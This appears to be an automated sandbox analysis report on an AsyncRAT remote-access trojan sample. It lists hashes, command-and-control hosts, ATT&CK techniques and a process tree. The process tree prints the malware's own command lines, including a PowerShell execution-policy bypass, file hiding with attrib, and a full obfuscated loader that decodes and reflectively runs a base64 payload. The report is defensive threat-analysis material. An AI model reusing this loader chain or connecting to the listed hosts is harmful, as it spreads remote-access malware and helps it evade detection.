asyncrat | 47a46de105177d826cbda74051f7f9d7bb95ed079c2e636743f9f04ad8c6c4a7

Analysis

max time kernel
120s
max time network
149s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
06-08-2024 14:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

47a46de105177d826cbda74051f7f9d7bb95ed079c2e636743f9f04ad8c6c4a7.exe
Size

45KB
MD5

3b86abe4c79286ed06965c268968c03d
SHA1

64afe64ee719aa3526023a5f7edacd44db21bde4
SHA256

47a46de105177d826cbda74051f7f9d7bb95ed079c2e636743f9f04ad8c6c4a7
SHA512

68f108646437fd72622cd1f719b2092b095e67500502981c4b605c64acaa38c12f46a82e47318b405137e5112ff82ccb51bfbb953b67fd3d1e9a5de1c2874483
SSDEEP

768:juAKNTR4ydbWUnrGJmo2q7zL5P02FUFdxYkk8PIWzjbAgX3ih8QNd4sqyVUbGKZ9:juAKNTRZ22oLDmWBW3bnXSh8QN6sqEWh

Score

10^/10

asyncrat discovery evasion execution rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

blue.o7lab.me:7777

server.underground-cheat.xyz:7777

Mutex

dtDtRWyW1m1g

Attributes

delay
3
install
false
install_file
$77WinUpdate.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
572	attrib.exe

Executes dropped EXE 1 IoCs

pid	Process
1500	fzqwoy.cmd.Jla

Loads dropped DLL 1 IoCs

pid	Process
2028	cmd.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

pid	Process
2880	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	47a46de105177d826cbda74051f7f9d7bb95ed079c2e636743f9f04ad8c6c4a7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fzqwoy.cmd.Jla

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2880	powershell.exe
2880	powershell.exe
2880	powershell.exe
2624	47a46de105177d826cbda74051f7f9d7bb95ed079c2e636743f9f04ad8c6c4a7.exe
1500	fzqwoy.cmd.Jla

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2624	47a46de105177d826cbda74051f7f9d7bb95ed079c2e636743f9f04ad8c6c4a7.exe
Token: SeDebugPrivilege	2880	powershell.exe
Token: SeDebugPrivilege	1500	fzqwoy.cmd.Jla

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2624 wrote to memory of 1644	2624	47a46de105177d826cbda74051f7f9d7bb95ed079c2e636743f9f04ad8c6c4a7.exe	31
PID 2624 wrote to memory of 1644	2624	47a46de105177d826cbda74051f7f9d7bb95ed079c2e636743f9f04ad8c6c4a7.exe	31
PID 2624 wrote to memory of 1644	2624	47a46de105177d826cbda74051f7f9d7bb95ed079c2e636743f9f04ad8c6c4a7.exe	31
PID 2624 wrote to memory of 1644	2624	47a46de105177d826cbda74051f7f9d7bb95ed079c2e636743f9f04ad8c6c4a7.exe	31
PID 1644 wrote to memory of 2880	1644	cmd.exe	33
PID 1644 wrote to memory of 2880	1644	cmd.exe	33
PID 1644 wrote to memory of 2880	1644	cmd.exe	33
PID 1644 wrote to memory of 2880	1644	cmd.exe	33
PID 2880 wrote to memory of 2028	2880	powershell.exe	34
PID 2880 wrote to memory of 2028	2880	powershell.exe	34
PID 2880 wrote to memory of 2028	2880	powershell.exe	34
PID 2880 wrote to memory of 2028	2880	powershell.exe	34
PID 2028 wrote to memory of 1600	2028	cmd.exe	36
PID 2028 wrote to memory of 1600	2028	cmd.exe	36
PID 2028 wrote to memory of 1600	2028	cmd.exe	36
PID 2028 wrote to memory of 1600	2028	cmd.exe	36
PID 2028 wrote to memory of 1384	2028	cmd.exe	37
PID 2028 wrote to memory of 1384	2028	cmd.exe	37
PID 2028 wrote to memory of 1384	2028	cmd.exe	37
PID 2028 wrote to memory of 1384	2028	cmd.exe	37
PID 2028 wrote to memory of 572	2028	cmd.exe	38
PID 2028 wrote to memory of 572	2028	cmd.exe	38
PID 2028 wrote to memory of 572	2028	cmd.exe	38
PID 2028 wrote to memory of 572	2028	cmd.exe	38
PID 2028 wrote to memory of 1500	2028	cmd.exe	39
PID 2028 wrote to memory of 1500	2028	cmd.exe	39
PID 2028 wrote to memory of 1500	2028	cmd.exe	39
PID 2028 wrote to memory of 1500	2028	cmd.exe	39

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
572	attrib.exe

C:\Users\Admin\AppData\Local\Temp\47a46de105177d826cbda74051f7f9d7bb95ed079c2e636743f9f04ad8c6c4a7.exe
"C:\Users\Admin\AppData\Local\Temp\47a46de105177d826cbda74051f7f9d7bb95ed079c2e636743f9f04ad8c6c4a7.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2624
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\fzqwoy.cmd"' & exit
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1644
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\fzqwoy.cmd"'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2880
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\fzqwoy.cmd" "
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2028
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo F "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1600
    - - C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\fzqwoy.cmd.Jla
        5⤵
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:1384
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h C:\Users\Admin\AppData\Local\Temp\fzqwoy.cmd.Jla
        5⤵
        Sets file to hidden
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:572
    - - C:\Users\Admin\AppData\Local\Temp\fzqwoy.cmd.Jla
        
        C:\Users\Admin\AppData\Local\Temp\fzqwoy.cmd.Jla -WindowStyle hidden -command "$Fywwr = get-content 'C:\Users\Admin\AppData\Local\Temp\fzqwoy.cmd' | Select-Object -Last 1; $Oidbnh = [System.Convert]::FromBase64String($Fywwr);$Gpldsatvv = New-Object System.IO.MemoryStream( , $Oidbnh );$Vhfdab = New-Object System.IO.MemoryStream;$Phmdkmi = New-Object System.IO.Compression.GzipStream $Gpldsatvv, ([IO.Compression.CompressionMode]::Decompress);$Phmdkmi.CopyTo( $Vhfdab );$Phmdkmi.Close();$Gpldsatvv.Close();[byte[]] $Oidbnh = $Vhfdab.ToArray();[Array]::Reverse($Oidbnh); $Jcglv = [System.Threading.Thread]::GetDomain().Load($Oidbnh); $Jfbubqgvmqz = $Jcglv.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Jfbubqgvmqz.DeclaringType, $Jfbubqgvmqz.Name).DynamicInvoke() | Out-Null"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1500

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Cab9B3.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar3680.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fzqwoy.cmd

Filesize
1.2MB

MD5
b5e5e096bc15d44c8a013699e1a3dd13

SHA1
ce162f58e3a72e414089008db282e22435acf21f

SHA256
64635af7d3e0bab77a46c403711a6587ea1e722bba28303355860712184de91b

SHA512
bf7ab978fc19525eb6bc9ed6faf76b008feaa357e755c9cf67c3545bb867e0b0b6930d061cf138b1adf9345cbbb118734d40ef0096c38c636bce400f55ada556

Download Submit
C:\Users\Admin\AppData\Local\Temp\fzqwoy.cmd.Jla

Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
memory/2624-0-0x000000007417E000-0x000000007417F000-memory.dmp

Filesize
4KB

Download
memory/2624-1-0x0000000000F80000-0x0000000000F92000-memory.dmp

Filesize
72KB

Download
memory/2624-2-0x0000000074170000-0x000000007485E000-memory.dmp

Filesize
6.9MB

Download
memory/2624-19-0x0000000005320000-0x0000000005382000-memory.dmp

Filesize
392KB

Download
memory/2624-48-0x000000007417E000-0x000000007417F000-memory.dmp

Filesize
4KB

Download
memory/2624-49-0x0000000074170000-0x000000007485E000-memory.dmp

Filesize
6.9MB

Download